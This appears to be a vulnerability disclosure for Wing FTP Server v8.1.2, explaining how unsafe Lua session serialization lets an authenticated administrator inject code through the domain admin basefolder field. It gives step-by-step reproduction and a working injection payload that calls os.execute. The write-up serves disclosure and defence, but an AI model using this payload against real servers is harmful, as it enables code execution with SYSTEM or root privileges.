Share
## https://sploitus.com/exploit?id=010D36EA-64D2-58CB-BBA2-67A76125216C
Wing FTP Server v8.1.2 contains a Remote Code Execution (RCE) vulnerability in the session serialization mechanism. An authenticated administrator can inject arbitrary Lua code through the domain admin `mydirectory` (basefolder) field, which gets executed server-side via `loadfile()`.

This is a separate vulnerability from CVE-2025-47812. The fix applied in v7.4.4 for CVE-2025-47812 addressed only the null byte injection vector in the username field. The underlying unsafe session serialization was not fixed, and remains exploitable through the admin basefolder field in v8.1.2.

The session serialization function `serialize()` in `SessionModule.lua` (line 103) and `SessionModuleAdmin.lua` (line 104) writes string values using Lua `[[...]]` long-string notation:

    outf("_SESSION["..k.."]=[["..v.."]]\r\n")
    

If a session value contains `]]`, the long string closes prematurely and the remaining content is parsed as executable Lua code.

Bracket sanitization code exists in `cgi.lua` (lines 274-275) and `cgiadmin.lua` (lines 277-278) but is commented out:

    --v = string.gsub(v,"%[","")
    --v = string.gsub(v,"%]","")
    

The session metatable that would enforce this sanitization is also disabled:

    --setmetatable(_SESSION,session_metatable)   -- cgi.lua:282, cgiadmin.lua:285
    

Exploitation
------------

Step 1 — Inject payload via domain admin basefolder:

An authenticated full administrator creates or modifies a domain admin account. The `mydirectory` field is set to:

    C:\ftproot]]os.execute("whoami > C:\\proof.txt")--
    

The endpoints `service_add_admin.html` and `service_modify_admin.html` do not sanitize bracket characters from the `mydirectory` field. (`service_add_admin.html` strips brackets from the username at lines 14-15, but not from `mydirectory`.)

Step 2 — Trigger execution:

When the poisoned domain admin logs in via `service_login.html`, the basefolder is stored directly in the session:

    rawset(_SESSION,"admin_basefolder",basefolder)   -- service_login.html:95
    rawset(_SESSION,"admin_nowpath",basefolder)       -- service_login.html:96
    

`SessionModuleAdmin.save()` writes this to the session file as:

    _SESSION['admin_basefolder']=[[C:\ftproot]]os.execute("whoami > C:\\proof.txt")--]]
    

Step 3 — Code execution:

On the next HTTP request using that session, `SessionModuleAdmin.load()` calls `loadfile()` followed by `f()` (lines 184-188). The Lua parser interprets the session file as:

    _SESSION['admin_basefolder']=[[C:\ftproot]]     --> assigns string "C:\ftproot"
    os.execute("whoami > C:\\proof.txt")            --> EXECUTES AS CODE
    --]]                                            --> rest is commented out
    

The payload runs with the privileges of the Wing FTP Server process (SYSTEM on Windows, root on Linux).

Proof of Concept
----------------

A working PoC exploit has been developed and tested against Wing FTP Server v8.1.2 on Windows.

Reproduction steps:

1.  Log in to the admin panel
2.  Create a new domain admin with the following `mydirectory` value:
    
        C:\ftproot]]os.execute("whoami > C:\\wingftp_rce_proof.txt")--
        
    
3.  Log in as the newly created domain admin
4.  Navigate to any admin page (triggers session load)
5.  Verify that `C:\wingftp_rce_proof.txt` was created containing the server's username